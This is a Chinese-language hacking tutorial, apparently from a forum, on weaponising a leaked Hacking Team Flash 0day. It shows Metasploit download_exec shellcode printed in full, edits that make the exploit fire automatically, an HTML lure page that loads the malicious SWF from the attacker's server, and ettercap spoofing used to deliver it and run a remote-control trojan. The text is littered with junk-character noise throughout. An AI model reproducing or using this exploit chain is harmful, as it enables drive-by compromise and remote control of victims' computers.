3 C! b; i3 D; @, P% j* M4 ?' O 三、flash 0day之手工代码修改制作下载者实例入侵演示 ; T9 v4 f" X+ _- \& n# Q9 G
8 t* T: N; z" c0 ~8 L7 e' y% M& ~9 F! x
利用到的工具:
# K9 _+ G% @# {( I* Q+ @; m" H6 E' q
) i) n1 n- B: z) n- q" i7 e2 e& i1 }# r9 @
Msf 7 q5 I: L& c& u
! V" s0 q2 ]5 n: j: h6 N6 P# u
% w0 L. h3 S* j# b0 B2 u Ettercap
: g- Q/ l$ I. Q5 z9 ^% w
0 d1 }* d8 z1 r( Z4 A% L. z9 ? Q; F, b$ R% }: b+ m) B
Adobe Flash CS6 8 u1 L+ s% G; g+ M/ i
) g. q+ j; T. g; _9 M O6 |/ o& ~8 I, Y$ r
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
0 ~" s" M ^) g4 n. v2 F
/ n9 \( P l( Z, J9 M; S. h K" g. d
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
l( [* d' h( e B $ Z& k. h }" W6 Y) _' |2 W2 R, W
+ C, d6 _5 [& R# j% x, B7 U( K
如图:
2 J1 u& K2 D2 I. y! M 4 l. X8 e8 R! M1 U1 t4 @6 s
0 E9 b! W4 R% _$ V: P2 Y
, @9 M7 [% }5 k' y! C
" Z* a# H' I k: H; G/ W
" ]( U; f I1 e2 _. `% } : L7 }$ s* K1 I: e/ K, ]
! E7 P3 j# P+ X
0 q- g% K, t: R S' K% D) z! k v# {
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) B5 }- n! `! W: I, ~) N
' I' e. ]2 Z5 a3 a
* \7 v7 @# W6 h% ?7 z: s
$ T6 F. F8 S$ i9 ~7 I
% D' Q+ _; Z) B2 z# P S) g: }* t
3 T/ D$ ]: p" v2 k $ [0 j8 D; z( J5 C( i ]
4 z' P+ }8 r/ g/ D8 ` 然后执行generate -t dword生成shellcode,如下: , Q- ?7 m. s! f: z7 x/ O
2 b& a( T7 m1 Q3 I5 Z8 ?' O
$ q2 T6 P- M1 s9 {$ m I( ^
: X# O+ P |" U0 L/ M
# }" z' T4 d# r3 n( s" A# q9 u9 A: a8 V h+ x
复制代码到文本下便于我们一会编辑flash exp,如下: 0 r# i2 b) p0 g& g3 q% b' [0 D
. K! e! Y. a- m$ `
! P0 N* }6 V, q, ?5 R 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
/ p. x/ x' r; c8 C; f3 t$ m ( X+ C2 S# D0 F3 o/ o5 V) V. |% a7 P. O
% f1 D9 m+ i3 F9 Z7 j7 @ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
A' N: Y& s5 p# q 3 i# Z O0 m3 L2 c+ ^' a; k
) \# _5 I: l8 {8 `$ G& O
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
9 J+ T( ]$ T6 y" @6 ` / u7 e2 j3 N& I. t
- ?. q' P9 j: r 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, . [0 [* C- l6 d( Z% [, H
7 D/ D2 _5 R% s! @/ ]$ V
6 c8 b0 U& q* c2 Q W' q 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
& z9 S( H- v7 X: |* m% ]" E 8 n; W: V6 L8 O8 V
! S( c/ R. a* k8 ^' S
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
; M% p/ W- N4 d+ J7 I0 n$ E# P
' [+ Q& y# P0 o, {4 L- @. P" e. M6 n
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
$ g! I: e& U$ M% ?1 d6 ]2 d
7 K0 P2 t4 U, [/ e! a
3 M, M j* G! i% W% H& Q' _ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
# P, d0 w( M$ L! O( h ' I! G5 i7 X2 ?4 K- A Y+ W
4 R4 Q! D5 G% I2 q
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
* X+ q! t2 H" e b# F9 ]" Y- d 1 [2 z" \+ P4 d$ g+ F. m" R$ w
* l C K! F. s9 | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
! o' ]; \: C, k y ; H% A0 _7 I% R0 K& {2 ~* ~
, C- C) v7 _" b, U 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, $ ^4 Q) U" r" W; A$ y. F7 T
5 y# X9 N" h$ e2 y1 |+ h. x3 T7 \ m8 n0 I8 Q, Z. y
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ) w) [ E1 g9 m" D! u
: i3 ^) r. e2 Y) f# ^8 E$ j2 s1 R1 r2 J
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, + d+ E3 [: ^3 u) G3 I
; m: ^$ j" y' ^0 F
/ {' g( S3 ^ l$ [ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
( p$ t/ K; ~- Y( Z( Y3 d+ F1 k 0 x7 w. }( Q" D# d8 F% w
9 X, G* T+ @. B1 Y6 T1 _# n
9 P- y- P2 u$ S6 H+ _/ S& q
! w4 J! w N. m- b; _
& o; g3 p% G" n( s6 X: g
' i4 G& q$ p. Y3 V' A
3 Y* i* f/ k# L# p8 { M Z9 ^) H0 ]
! \. B/ y. z2 x7 D 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ; _. w; U0 U8 X- n1 {7 ^
9 B! C8 }! ~! V+ J% d) `. ~1 \: p& R- r
: `2 e* h# D. V5 J- @, P/ l/ Y
, X4 r: L' G& a1 i' q7 `- e! a) x# L( R" W$ P2 U
先修改ShellWin32.as,部分源代码如图:
+ }; ^! P+ k' t. Q- S
5 v l: ^) u8 K+ U! S2 B) K" @7 T% D
7 T$ Z, e j$ J& a/ ~8 B" P' S* D
& i' @: b: U$ K( h2 g1 P3 D) {3 a) c; i
4 A+ F$ D: u. G 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! {8 ?/ E4 H8 V& n! v: }" d- Q 8 C+ f. h8 \. R! {( u
2 C' J: K4 t3 t9 d3 E
$ V) e7 k O+ W) `% T$ G * C j, x* S$ b# b4 c
" ?' I( I9 l' v8 ~7 ` 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 4 l: l f/ S/ a) X3 P+ M2 I
/ c6 k2 N) o4 ^/ E: ~
E1 z! Z$ K% E8 H" [& v+ Z, Y
* D: Q7 ^; e5 x( ^/ D3 F2 v2 M - {( ~4 b) F- {' t
' W6 ? k9 q1 x3 C b 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
6 ~$ r( l7 ?7 D7 Q% Q+ e
" b* g" |/ T5 i7 T) m, ^: W
, l! L1 z$ [8 O- E( N, x * n: @* @/ p: U# T
+ v1 y# d a/ y+ w
. s& ?6 o1 C8 a' j1 b6 J" y / m9 M! Y% e( N- W- L* n* T, z1 X' R
5 M. Z9 ]# {& q! H& y1 P
4 C \9 v/ m$ z: ?3 W/ y
/ d" U5 y: F$ ~4 n5 D# {
6 K0 P4 @! L. o' d5 [* y
" ~, \7 H* v% A3 y 然后点保存,下面我们来编译一下,打开
5 v+ |! r- y; U" H; ^& p1 B # K* S3 e( X( X/ i! j9 l% M
( ^6 u7 _& c. |, _ exp1.fla然后点文件-发布,看看编译没错误 + _$ w$ N4 J2 H0 \ h
9 s) i) k3 N% H, |( w
: w. ?- x) X8 m1 z " Z) k4 b: m) I8 p
( v. P- n: H" B9 Z/ F! ]1 R
0 G) R5 R- s, J4 a " z1 A& @3 |2 \
! N8 V$ k4 `' }2 s) T% r! \
7 u' Q% f# p7 u7 s; n- P3 t9 e6 a
2 U* v% \5 v* K2 X; r/ L. C
. B' z5 m1 w; v( P
7 t# O5 ]% C6 w; ~ N
1 Y* s! v7 @$ B4 E0 ?7 w7 L$ m
1 J: Q1 i+ Z$ |; P. i- r% |; p
% O; A5 f$ N' m: t
然后我们把生成的 4 S$ k2 Y+ U0 l6 h9 \. _
' x3 ]/ n3 L/ l- ?
1 z2 N/ V+ G) r7 F exp1.swf丢到kailinux 的/var/www/html下:
" b* }' _; x2 t0 V3 Y+ \" i7 j2 Z - x' E" Y0 G$ I! f2 v
2 a+ q; R- B5 N. }1 R 然后把这段代码好好编辑一下
3 P; q; a6 ?* H3 M
) S& ?2 t7 b9 a* B: y. x6 N/ l
8 [' A9 Q; B% a+ q5 s8 i4 l0 L7 o
* e0 m1 |7 D* l: Q$ C* q
, g$ P, J* x9 D, a9 p
' d5 A( }9 M* x8 k2 A- p% v i
$ o8 R: S# ?! W# j; {5 ] E0 f/ u- B: t+ W8 D$ X7 t
, r! A0 W) T+ Q1 b
# Z2 c0 d6 G' t" G
G) L$ k! r( @
0 ]) F$ B! J8 A5 X, m4 E* p ) G5 e: h& z8 [; `" ^* R. s
0 F2 m/ k! j. V/ }0 T9 R& X6 _" B, x3 b5 P
; J+ p; p! d" D) w + t/ }" O* C% ?- G7 f& J" M
& B6 {0 q3 p2 S" I- e# |, r * C# K( I( E3 G
# B# a8 h6 i) ?2 e' ~: P) N( |( x( V8 M8 o" B
<!DOCTYPE html>
2 T! o3 {2 }; R% e# O3 X; K6 o1 D: L
! {2 N+ c+ @$ a
) h* a T/ A. B- W& n <html> 5 P3 k* l8 a. d( Q
( m) }3 h3 S/ j1 I
* Y9 F' J/ h/ F: V; h! t
<head>
4 }6 q4 p' S- g, Z
% v6 Y5 J9 Y R* j# s0 t. m4 C& f8 v7 T3 p" l( c* A
<meta http-equiv="Content-Type" content="text/html;
6 |" [: T4 S' |3 G2 s1 W; G5 H0 y! @ V 3 M# z, X u6 Q1 n# |9 n
. u9 {1 |; `! K# U- {0 Z charset=utf-8"/>
; n, g0 a$ E7 x! \, @
& v8 ~/ ^6 R% E7 q9 ]% ~ r- ], o b) B/ y; z
</head> 7 n0 G% }7 q {% U' d
% }* A& _6 ^* @* l/ j" t
; c( m, }' N) F6 \: }
<body>
- M+ u# o- M; `; ?+ \
2 [( _* K' v- }6 Y
, M y4 s) a7 n n' _ <h2> Please wait, the requested page is loading...</h2>
5 M2 {) d% T8 E& f/ @$ w
7 s. Y# i0 s2 d- @) N6 E/ ?
2 }9 D0 q) F2 Z; \9 b <br> T2 p( D8 f' u$ `
- k6 g4 g5 ^& n2 W' l8 \0 M
) V5 [ d6 |/ H) b) {) I6 f5 ~ <OBJECT
/ F3 d/ m* j* Q
0 `3 z2 S' A) _
1 D) f" J. o+ l5 Y* R! x classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 1 Z9 X) A9 g! C' Q4 W6 k6 p
* p4 v) O* Y6 g7 w
, q$ _6 k8 [! `6 r: s
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 E4 ?. v' @7 N% T A! U5 y
! {1 P, n# i1 U. B; ^0 A
' a4 X5 x7 z! P6 M </body> / t( T7 J; q0 S' H* v
; P5 L$ X1 N0 r+ w
. e3 w/ Y$ H- ?: @- p8 O* G
<script> ) r+ v( H, G: }4 n( F# d
; ?4 \$ v8 o0 B% D9 Q+ t7 W8 A5 I8 n$ M
setTimeout(function () { ; S: M: @* x. O5 @
2 ~1 b6 O/ v3 X) c- ?
" Z! p* y9 B" g, e! O% ~# T6 U , H. X5 M B, x ?! L
+ U; ?% |! ]& S v0 t
1 n' K; y( ?9 Y1 @$ t4 g; j+ v
window.location.reload(); t. j* x* N( x. _5 ^* l- Q
) ]9 {- x/ n" X% \; B+ L T$ F
0 q) t2 P8 @4 P h/ N) M Y }, 10000); : O' B, h1 f7 @# [, a
9 \0 p% ^& R; \; [/ }
' v5 L' _, y- T( b+ L0 O! t# D
! b0 r, ]' X X0 t8 [ ( Z" \' N: n2 u: b! z
& T% n5 }, {( {6 @' M2 ?2 Z) ]
</script>
' U+ [' k4 p% g8 X& t( f 8 ~* Y- ^4 Z3 i, n7 c
4 @" ?9 f& @. |9 c
</html>
m1 X K2 G# ^. c, k1 }
' }" v& Z* D3 p) F
0 f# }6 s+ K0 g& A8 j% g + j1 w- F/ F6 t4 F( n
. H F% f, [. T" U/ t/ }& k: c
Q3 S" I0 b- r' d9 ?$ O" m# f0 L
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: + i8 q, i! w1 t
% f2 X4 i( ]7 W5 }) Z) `5 X" z. m' b f' z/ Z5 w
( w. b1 N% B" t, e5 V! X: R8 A9 W ! U% V& T$ ?, O2 a2 B: _
) ]8 X+ I3 x9 R; K5 W* {
, c: b! s1 g+ \! m3 y: i2 z
) Q2 w7 i2 E# z
& I) l) X0 P1 L% a; I6 W 3 B: z% k$ Q5 G, C X
3 L! w8 Y {, f4 f& X0 M" |1 A" R' q
8 N/ x8 L' r9 g& n0 a) p8 Z2 c
" `! j9 E* C R- n9 J+ X g
4 w% T0 W* [2 S* o I' o1 c+ d# d& Z
" i1 X6 G* U" l' S- ]+ d
1 E* `$ q$ p& P
# T2 [; V& x. |. m% e 下面我们用ettercap欺骗如图: " r- K; U2 J' [0 t8 f5 R! t
; {% ?- W. |( F- q0 v+ r% N R2 p
9 A: j1 o, z: T- L/ z
! _6 l& m6 U( m
* g0 `) M1 R2 c8 j( z* l& l5 l; n+ }; ^% O
3 h4 [/ Z( {9 |7 {* w: Q c
% o2 [, e" V6 {0 z& r
" D% `. L0 r# M/ Q5 j 下面我们随便访问个网站看看:
" W+ \, Z! ~' k, L
( B4 ~2 ^' ?: k4 n& p! F2 k
0 d- ~- S: L6 i$ D 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
5 {8 Z6 i& ^4 B+ k$ y- i7 v ) } e6 D, R+ y9 m# K4 Q2 J. b J
* k4 x* z& n# `* z1 ~
* X# A I% l) ]
. S8 u0 y6 |9 {8 Z2 j) Y: V
- [: F3 [7 Y1 W j) i 我们看另一台,
! @4 ~2 C4 [# o) w; G * P* Y4 l8 O9 \3 ]' Z- T8 Y
4 v' t% v8 H6 R7 J+ t 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
" E2 O4 k- A! | |